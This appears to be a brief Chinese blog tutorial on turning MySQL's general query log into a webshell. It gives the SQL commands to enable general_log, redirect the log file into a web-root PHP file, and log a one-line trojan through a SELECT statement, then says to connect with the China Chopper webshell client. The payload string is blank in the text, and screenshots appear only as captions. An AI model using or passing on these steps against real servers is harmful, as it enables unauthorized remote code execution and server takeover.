利用general_log来getshell

 

设置了 general_log 和 general_log_file 之后所有SQL记录都会写入指定的文件

使用show variables like '%general%'; //查询general_log的开启状态如图

利用general_log来getshell_第1张图片

如果没有开启可以使用set global general_log=on;//将其打开。
然后使用set global general_log_file='D:/wamp/www/1.php';//将日志产生的默认路径改为D:/wamp/www/1.php。执行成功后,查看日志文件是否生成

利用general_log来getshell_第2张图片

使用selece语句写入一句话木马select ''

执行的语句会被记录到日志中去,使用菜刀连接刚才修改的路径。

利用general_log来getshell_第3张图片

 

利用general_log来getshell_第4张图片

你可能感兴趣的:(网络安全)